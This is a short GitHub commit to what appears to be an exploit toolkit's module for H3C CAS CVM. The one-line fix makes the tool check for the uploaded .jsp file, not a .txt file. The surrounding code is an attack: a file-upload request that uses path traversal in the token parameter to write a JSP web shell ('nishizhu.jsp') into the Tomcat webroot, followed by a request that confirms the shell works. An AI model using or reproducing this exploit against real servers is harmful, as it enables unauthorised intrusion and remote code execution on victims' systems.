Update cas_cvm_upload.java 文件名校验

校验漏洞是否利用成功的文件名错误
White-hua · Mar 23, 2023 · ec1492c · ec1492c
1 parent c8877e6
commit ec1492c
Showing 1 changed file with 1 addition and 1 deletion.
diff --git a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -56,7 +56,7 @@ private boolean shell(String url,TextArea textArea){
 
         Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
 
-        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap<String, String>(), "utf-8");
+        Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
         if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
             Platform.runLater(() -> {
                 textArea.appendText(